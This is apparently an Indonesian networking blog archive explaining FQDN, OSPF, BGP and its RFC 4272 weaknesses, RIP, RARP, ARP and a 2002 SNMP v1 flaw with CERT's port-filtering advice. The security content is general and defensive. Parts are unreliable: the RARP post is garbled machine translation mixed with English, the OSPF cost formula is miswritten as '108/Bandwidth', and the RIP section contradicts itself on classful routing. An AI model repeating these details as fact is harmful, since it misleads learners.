Sebuah FQDN dari sebuah host mengandung nama host miliknya digabungkan dengan nama domain (dan subdomain) di mana host tersebut berada, yang kemudian dipisahkan dengan menggunakan tanda titik (.). FQDN umumnya digunakan di dalam Uniform Resource Locator (URL) yang digunakan untuk mengakses halaman web di dalam jaringan dan Internet dan membuat path absolut terhadap ruang nama (namespace) DNS ke host target di mana halaman web tersebut berada. FQDN berbeda dengan nama domain biasa karena FQDN merupakan nama absolut dari domain, sehingga sufiks domain tidak perlu ditambahkan.

Contoh FQDN: untuk sebuah nama FQDN id.wikipedia.org, dapat diambil pernyataan bahwa id merupakan nama host, dan wikipedia.org merupakan nama domain-nya. Panjang maksimum dari FQDN adalah 255 bita.

Wednesday, January 19, 2011

Pengertian Open Shortest Path First (OSPF)

Open Shortest Path First (OSPF) adalah sebuah routing protokol standar terbuka yang telah di implementasikan oleh sejumlah besar vendor jaringan. OSPF bekerja dengan sebuah algoritma yang disebut Dijkstra. Open Shortest Path First (OSPF) merupakan protokol routing yang dipergunakan dalam Internet Protocol (IP) jaringan. ini adalah link-state routing protocol dan juga sebagai kelompok interior gateway protokol, yang beroperasi dalam satu sistem otonom (AS). Didefinisikan sebagai OSPF Versi 2 dalam RFC 2328 (1998) untuk IPv4. The update untuk IPv6 ditetapkan sebagai OSPF Versi 3 dalam RFC 5340 (2008). OSPF adalah mungkin yang paling banyak digunakan interior gateway protocol (IGP) di perusahaan besar jaringan.

Teknologi yang digunakan oleh routing protokol ini adalah teknologi link-state yang memang didesain untuk bekerja dengan sangat efisien dalam proses pengiriman update informasi rute.
Cara updatenya itu secara Triggered update, maksudnya tidak semua informasi yg ada di router akan dikirim seluruhnya ke router-router lainnya, tetapi hanya informasi yang berubah/bertambah/berkurang saja yang akan di kirim ke semua router dalam 1 area,
sehingga meng-efektifkan dan mengefisienkan bandwidth yg ada.

Proses OSPF (Open Shortest Path First)

Secara garis besar, proses yang dilakukan routing protokol OSPF mulai dari awal hingga dapat saling bertukar informasi ada lima langkah. Berikut ini adalah langkah-langkahnya:

1. Membentuk Adjacency Router


Adjacency router arti harafiahnya adalah router yang bersebelahan atau yang terdekat. Jadi proses pertama dari router OSPF ini adalah menghubungkan diri dan saling berkomunikasi dengan para router terdekat atau neighbour router.

2. Memilih Designated Router (DR) dan Backup Designated Router (BDR).(jika diperlukan)

Dalam jaringan broadcast multiaccess, DR dan BDR sangatlah diperlukan. DR dan BDR akan menjadi pusat komunikasi seputar informasi OSPF dalam jaringan tersebut.

3. Mengumpulkan State-state dalam Jaringan

Setelah terbentuk hubungan antarrouter-router OSPF, kini saatnya untuk bertukar informasi mengenai state-state dan jalur-jalur yang ada dalam jaringan.

4. Memilih Rute Terbaik untuk Digunakan

Setelah informasi seluruh jaringan berada dalam database, maka kini saatnya untuk memilih rute terbaik untuk dimasukkan ke dalam routing table. Untuk memilih rute-rute terbaik, parameter yang digunakan oleh OSPF adalah Cost. Metrik Cost biasanya akan menggambarkan seberapa dekat dan cepatnya sebuah rute. Nilai Cost didapat dari perhitungan dengan
rumus: Cost of the link = 108 /Bandwidth
Router OSPF akan menghitung semua cost yang ada dan akan menjalankan algoritma
Shortest Path First untuk memilih rute terbaiknya. Setelah selesai, maka rute tersebut langsung dimasukkan dalam routing table dan siap digunakan untuk forwarding data.


5. Menjaga Informasi Routing Tetap Up-to-date

Ketika sebuah rute sudah masuk ke dalam routing table, router tersebut harus juga me-maintain state database-nya. Hal ini bertujuan kalau ada sebuah rute yang sudah
tidak valid, maka router harus tahu dan tidak boleh lagi menggunakannya. Ketika ada perubahan link-state dalam jaringan, OSPF router akan melakukan flooding terhadap perubahan ini. Tujuannya adalah agar seluruh router dalam jaringan mengetahui perubahan tersebut.


Tabel dalam OSPF

Pada OSPF memiliki 3 table di dalam router :
  • Routing table
Routing table biasa juga dipanggil sebagai Forwarding database. Database ini berisi the lowest cost utk mencapai router2/network2 lainnya. Setiap router mempunyai Routing table yang berbeda-beda.

  • Adjecency database
Database ini berisi semua router tetangganya. Setiap router mempunyai Adjecency database yang berbeda-beda.

  • Topological database
Database ini berisi seluruh informasi tentang router yang berada dalam satu networknya/areanya.



Lebih lengkapnya, download saja modulnya..
klik link di sini

Celah Keamanan BGP(Border Gateway Protocol)

BGP telah cukup lama diketahui memiliki banyak celah keamanan pada implementasi. Bahkan ada sebuah RFC tersendiri yang membahas mengenai celah keamanan pada BGP yaitu RFC
4272. Celah keamanan BGP banyak terkait dengan kelemahan protokol TCP yang digunakan sebagai media komunikasi pertukaran informasi routing. Selain itu celah keamanan BGP juga terkait dengan pesan (message) yang digunakan dalam pertukaran informasi routing dimana pesan tersebut sangat mungkin dipalsukan. Secara umum serangan pada kerja BGP, mengacu pada RFC 4272, bisa dikategorikan sebagai berikut:

  • Pelanggaran confidentiality, hal ini karena BGP mempertukarkan informasi dalam bentuk cleartext.
  • Replay attack, hal ini karena BGP tidak menyediakan mekanisme untuk mencegah terjadinya replay attack.
  • BGP message modification, meliputi message insertion, message deletion, message modification.
  • Denial of Service, serangan pada BGP yang memungkinkan untuk mematikan ketersediaan akses jaringan.

Jenis Parameter yang digunakan BGP untuk Routing

BGP (Border Gateway Protocol) menggunakan beberapa parameter dalam mengambil keputusan jalur mana yang dipakai untuk mengirimkan data yaitu:

  • Weight, merupakan parameter dari router itu sendiri mengenairouting mana yang hendak dipilih. Weight diberikan kesebuah router dan hanya digunakan pada router itu sendiri. Semakin tinggi nilai weight dari sebuah router maka semakin baik jalur routing melalui router tersebut.
  • Local Preference, merupakan parameter lain yang digunakan dalam pemilihan jalur routing. Berbeda dengan weight yang hanya digunakan sendiri oleh router, local preference
    digunakan bersama antar router iBGP tetapi tidak dapat digunakan secara bersama pada router eBGP. Default nilai local preference adalah 100, semakin tinggi nilai local preference menunjukkan semakin baiknya jalur routing tersebut.
  • Multi-Exit Descriminator (MED), menggambarkan kondisi jalur yang kita miliki ke router eksternal. Lain halnya dengan weight dan local preference, MED meninggalkan jaringan kita dan menceritakan ke neighbor jalur routing mana yang ingin kita gunakan. Default nilai MED adalah 0, semakin kecil nilai MED menunjukkan semakin baiknya jalur routing.
  • Origin, merupakan gambaran sebuah jalur routing berasal dari protokol IGP, EGP, atau redistribusi dari protokol lain. Origin dari protokol IGP memiliki nilai 0, protokol EGP
    memiliki nilai 1, sedangkan hasil redistribusi dari protokol lain dianggap incomplete dan memiliki nilai origin 2.
  • AS-PATH, jalur routing BGP berdasarkan pada daftar autonomous system yang harus dilewati untuk mencapai sebuah alamat tujuan. Jalur routing yang dipilih adalah jalur routing dengan AS-PATH paling pendek. Dengan AS-PATH memungkinkan BGP mendeteksi adanya routing loop.
BGP hanya memilih sebuah jalur routing untuk mencapai sebuah alamat tujuan. Jalur routing ini ditambahkan ke dalam tabel routing dan didistribusikan ke BGP peers (neighbor).

Autonomous System

Autonomous System atau yang disingkat AS adalah suatu kelompok yang terdiri dari satu atau lebih IP Prefix yang terkoneksi yang dijalankan oleh satu atau lebih operator jaringan dibawah satu kebijakan routing yang didefinisikan dengan jelas. AS diperlukan bila suatu jaringan terhubung ke lebih dari satu AS yang memiliki kebijakan routing yang berbeda. Contoh yang paling sering dijumpai adalah: jaringan yang terhubung kepada dua upstream atau lebih ataupun eXchange Point, peering dengan jaringan lokal pada eXchange Point. Autonomous System Number atau yang disingkat ASN adalah nomor two-byte unik yang diasosiasikan dengan AS. ASN digunakan sebagai pengidentifikasi yang memungkinkan AS untuk saling menukar informasi routing dinamik dengan AS yang lain. Protokol routing eksterior seperti Border Gateway Protocol (BGP) membutuhkan ASN untuk saling bertukar informasi antara jaringan.


source : http://id.wikipedia.org/wiki/Autonomous_System

BGP (Border Gateway Protocol)

Border Gateway Protocol disingkat BGP adalah inti dari protokol routing Internet. Protocol ini yang menjadi backbone dari jaringan Internet dunia. BGP adalah protokol routing inti dari Internet yg digunakan untuk melakukan pertukaran informasi routing antar jaringan.

Border Gateway Protocol (BGP) merupakan protokol routing antar Autonomous System (AS). Autonomous System (AS), mengacu pada dokumen IETF RFC 1930 didefinisikan sebagai kumpulan router-router pada satu pengelolaan administrative yang menggunakan IGP sebagai protokol routing dalam AS tersebut dan menggunakan EGP sebagai protokol routing ke AS lain. Nomor AS dimulai dari 1 sampai 65535 dengan catatan nomor AS 64512 sampai 65535 digunakan sebagai nomor AS private. Walaupun BGP merupakan protokol routing EGP yang merouting paket data antar AS tetapi BGP juga mendukung proses routing paket data dalam sebuah AS. Berdasar pada nomor AS yang digunakan dalam proses routing, BGP dikategorikan menjadi dua, yaitu:
  • Internal BGP (iBGP) merupakan proses pertukaran informasi routing dalam sebuah AS.
  • Eksternal BGP (eBGP) merupakan proses pertukaran informasi routing BGP antar router-router di internet yang berbeda AS.
BGP merupakan protokol routing yang memanfaatkan TCP port 179 untuk pertukaran informasi routing antar router.

RIP (Routing Information Protocol)

Sedikit berbagi informasi tentang RIP. Apa itu RIP ?

RIP adalah protokol routing dinamik yang berbasis distance vector. RIP menggunakan
protokol UDP pada port 520 untuk mengirimkan informasi routing antar router. RIP
menghitung routing terbaik berdasarkan perhitungan HOP. RIP membutuhkan waktu untuk
melakukan converge. RIP membutuhkan power CPU yang rendah dan memory yang kecil
daripada protokol yang lainnya.

  • SEJARAH
Algoritma routing yang digunakan dalam RIP, algoritma Bellman-Ford, pertama kali digunakan dalam jaringan komputer pada tahun 1968, sebagai awal dari algoritma routing ARPANET.
Versi paling awal protokol khusus yang menjadi RIP adalah Gateway Information Protocol, sebagai bagian dari PARC Universal Packet internetworking protocol suite, yang dikembangkan di Xerox Parc. Sebuah versi yang bernama Routing Information Protocol, adalah bagian dari Xerox Network Services.
Sebuah versi dari RIP yang mendukung Internet Protocol (IP) kemudian dimasukkan dalam Berkeley Software Distribution (BSD) dari sistem operasi Unix. Ini dikenal sebagai daemon routed. Berbagai vendor lainnya membuat protokol routing yang diimplementasikan sendiri. Akhirnya, RFC 1058 menyatukan berbagai implementasi di bawah satu standar.

RIP memiliki beberapa keterbatasan, antara lain:
1. METRIC: Hop Count
RIP menghitung routing terbaik berdasarkan hop count dimana belum tentu hop count
yang rendah menggunakan protokol LAN yang bagus, dan bisa saja RIP memilih jalur
jaringan yang lambat.
2. Hop Count Limit
RIP tidak dapat mengatur hop lebih dari 15. hal ini digunakan untuk mencegah loop
pada jaringan.
3. Classful Routing Only
RIP menggunakan classful routing ( /8, /16, /24 ). RIP tidak dapat mengatur classless
routing.



Ada tiga versi dari Routing Information Protocol: RIPv1, RIPv2, dan RIPng, yaitu :

  • RIP versi 1
Spesifikasi asli RIP, didefinisikan dalam RFC 1058, classful menggunakan routing. Update routing periodik tidak membawa informasi subnet, kurang dukungan untuk Variable Length Subnet Mask (VLSM). Keterbatasan ini tidak memungkinkan untuk memiliki subnet berukuran berbeda dalam kelas jaringan yang sama. Dengan kata lain, semua subnet dalam kelas jaringan harus memiliki ukuran yang sama. Juga tidak ada dukungan untuk router otentikasi, membuat RIP rentan terhadap berbagai serangan.

  • RIP versi 2
Karena kekurangan RIP asli spesifikasi, RIP versi 2 (RIPv2) dikembangkan pada tahun 1993 dan standar terakhir pada tahun 1998. Ini termasuk kemampuan untuk membawa informasi subnet, sehingga mendukung Classless Inter-Domain Routing (CIDR). Untuk menjaga kompatibilitas, maka batas hop dari 15 tetap. RIPv2 memiliki fasilitas untuk sepenuhnya beroperasi dengan spesifikasi awal jika semua protokol Harus Nol bidang dalam pesan RIPv1 benar ditentukan. Selain itu, aktifkan kompatibilitas fitur memungkinkan interoperabilitas halus penyesuaian.

Dalam upaya untuk menghindari beban yang tidak perlu host yang tidak berpartisipasi dalam routing, RIPv2 me-multicast seluruh tabel routing ke semua router yang berdekatan di alamat 224.0.0.9, sebagai lawan dari RIP yang menggunakan siaran unicast. Alamat 224.0.0.9 ini berada pada alamat IP versi 4 kelas D (range 224.0.0.0 - 239.255.255.255). Pengalamatan unicast masih diperbolehkan untuk aplikasi khusus.

(MD5) otentikasi RIP diperkenalkan pada tahun 1997.

RIPv2 adalah Standar Internet STD-56.
  • RIPng

RIPng (RIP Next Generation / RIP generasi berikutnya), yang didefinisikan dalam RFC 2080 adalah perluasan dari RIPv2 untuk mendukung IPv6, generasi Internet Protocol berikutnya.


Perbedaan utama antara RIPv2 dan RIPng adalah:

  • Dukungan dari jaringan IPv6.
  • RIPv2 mendukung otentikasi RIPv1, sedangkan RIPng tidak. IPv6 router itu, pada saat itu, seharusnya menggunakan IP Security (IPsec) untuk otentikasi.
  • * RIPv2 memungkinkan pemberian beragam tag untuk rute , sedangkan RIPng tidak;
  • RIPv2 meng-encode hop berikutnya (next-hop) ke setiap entry route, RIPng membutuhkan penyandian (encoding) tertentu dari hop berikutnya untuk satu set entry route .


Source : http://id.wikipedia.org/wiki/Routing_Information_Protocol

Monday, January 17, 2011

RARP (Reverse Address Resolution Protocol)

Reverse Address Resolution Protocol (RARP) adalah protokol jaringan usang komputer yang digunakan oleh komputer host untuk meminta perusahaan Internet Protocol ( IPv4 ) alamat dari suatu host administrasi, ketika telah yang tersedia Link Layer atau alamat perangkat keras, seperti MAC address.

RARP is described in Internet Engineering Task Force (IETF) publication RFC 903 . [ 1 ] It has been rendered obsolete by the Bootstrap Protocol (BOOTP) and the modern Dynamic Host Configuration Protocol (DHCP), which both support a much greater feature set than RARP. RARP digambarkan dalam Internet Engineering Task Force (IETF) Pengumuman RFC 903 . [1] Ia telah dianggap usang oleh Bootstrap Protocol (BOOTP) dan modern Dynamic Host Configuration Protocol (DHCP), yang mendukung kedua fitur yang jauh lebih besar daripada yang ditetapkan RARP.

RARP requires one or more server hosts to maintain a database of mappings of Link Layer addresses to their respective protocol addresses. Media Access Control (MAC) addresses needed to be individually configured on the servers by an administrator. RARP membutuhkan satu atau lebih host server untuk memelihara database pemetaan Link Layer alamat protokol masing-masing alamat mereka. Media Access Control (MAC) alamat yang diperlukan untuk secara individual dikonfigurasi pada server oleh administrator. RARP was limited to serving only IP addresses . RARP terbatas untuk melayani hanya alamat IP .

Reverse ARP differs from the Inverse Address Resolution Protocol (InARP) described in RFC 2390 , which is designed to obtain the IP address associated with another host's MAC address. Reverse ARP berbeda dari Inverse Address Resolution Protocol (InARP) dijelaskan dalam RFC 2390 , yang dirancang untuk mendapatkan alamat IP yang terkait dengan MAC address host lain. InARP is the complement of the Address Resolution Protocol used for the reverse lookup. InARP adalah pelengkap dari Address Resolution Protocol digunakan untuk reverse lookup.

Sesungguhnya RARP didisain untuk memecahkan masalah mapping alamat dalam sebuah mesin/komputer di mana mesin/komputer mengetahui alamat fisiknya namun tidak mengetahui alamat logikanya. Cara kerja RARP ini terjadi pada saat mesin seperti komputer atau router yang baru bergabung dalam jaringan lokal, kebanyakan tipe mesin yang menerapkan RARP adalah mesin yang diskless, atau tidak mempunyai aplikasi program dalam disk. RARP kemudian memberikan request secara broadcast di jaringan lokal. Mesin yang lain pada jaringan lokal yang mengetahui semua seluruh alamat IP akan akan meresponsnya dengan RARP reply secara unicast. Sebagai catatan, mesin yang merequest harus menjalankan program klien RARP, sedangkan mesin yang merespons harus menjalankan program server RARP.

ARP (Address Resolution Protocol)

sebuah protokol dalam TCP/IP Protocol Suite yang bertanggungjawab dalam melakukan resolusi alamat IP ke dalam alamat Media Access Control (MAC Address). ARP didefinisikan di dalam RFC 826

ARP berasosiasi antara alamat fisik dan alamat IP. Pada LAN, setiap device, host, station dll diidentifikasi dalam bentuk alamat fisik yang didapat dari NIC.

Setiap host atau router yang ingin mengetahui alamat fisik daripada host atau router yang terletak dalam jaringan lokal yang sama akan mengirim paket query ARP secara broadcast, sehingga seluruh host atau router yang berada pada jaringan lokal akan menerima paket query tersebut. Kemudain setiap router atau host yang menerima paket query dari salah satu host atau router yang mengirim maka akan diproses hanya oleh host atau router yang memiliki IP yang terdapat dalam paket query ARP. Host yang menerima respons akan mengirm balik kepada pengirim query yang berisi paket berupa informasi alamat IP dan alamat fisik.

Ketika sebuah aplikasi yang mendukung teknologi protokol jaringan TCP/IP mencoba untuk mengakses sebuah host TCP/IP dengan menggunakan alamat IP, maka alamat IP yang dimiliki oleh host yang dituju harus diterjemahkan terlebih dahulu ke dalam MAC Address agar frame-frame data dapat diteruskan ke tujuan dan diletakkan di atas media transmisi (kabel, radio, atau cahaya), setelah diproses terlebih dahulu oleh Network Interface Card (NIC). Hal ini dikarenakan NIC beroperasi dalam lapisan fisik dan lapisan data-link pada tujuh lapis model referensi OSI dan menggunakan alamat fisik daripada menggunakan alamat logis (seperti halnya alamat IP atau nama NetBIOS) untuk melakukan komunikasi data dalam jaringan.


Jika memang alamat yang dituju berada di luar jaringan lokal, maka ARP akan mencoba untuk mendapatkan MAC address dari antarmuka router lokal yang menghubungkan jaringan lokal ke luar jaringan (di mana komputer yang dituju berada).

Simple Network Management Protocol (SNMP)

Simple Network Management Protocol (SNMP) merupakan protokol standard industri yang digunakan untuk memonitor dan mengelola berbagai perangkat di jaringan Internet meliputi hub, router, switch, workstation dan sistem manajemen jaringan secara jarak jauh (remote). Baru-baru ini (pertengahan Februari 2002) Oulu University Secure Programming Group, sebuah group riset keamanan jaringan di Finlandia, telah menemukan adanya kelemahan (vulnerability) pada SNMP v1.

Kelemahan tersebut memungkinkan seorang cracker memasang back door pada peralatan yang menggunakan SNMP v1 sehingga bisa menyusup ke jaringan dan melakukan apa saja terhadap jaringan. Kelemahan ditemukan pada SNMP trap and request facilities yang memungkinkan penyusup memperoleh akses ke dalam sistem yang menjalankan SNMP dan melakukan serangan Denial of Service (DoS) yang membuat sistem tidak berfungsi (down) atau tidak stabil.

SNMP v1 telah dipakai sejak awal tahun 1980-an. Terdapat berbagai usaha untuk memperbaiki standard SNMP yaitu dengan munculnya SNMP v2 dan SNMP v3 pada tahun 1998. Namun usaha ini tidak begitu berhasil. Sebagian besar jaringan saat ini masih menggunakan SNMP v1.

Masalah ini cukup merepotkan karena tidak hanya menyangkut satu jenis peralatan dari satu vendor melainkan menyangkut perangkat dari berbagai banyak vendor sehingga diperlukan patch/update dari berbagai vendor yang peralatannya menggunakan SNMP v1.

Untuk mengatasi kelemahan pada SNMP ini CERT Coordination Center (www.cert.org), suatu pusat pengembangan dan riset keamanan Internet, merekomendasikan untuk sementara menutup jalan masuk (ingress filtering) trafik SNMP pada port 161/udp dan 162/udp. Jika hal ini tidak mungkin dilakukan, CERT menyarankan untuk membatasi trafik SNMP hanya pada Virtual Private Noetwork (VPN) atau mengisolasi sistem manajemen jaringan dari jaringan publik. Penutupan port dilakukan sementara sambil menunggu dikeluarkannya pacth/update dari pihak vendor yang membuat perangkat yang menggunakan SNMP v1 tersebut.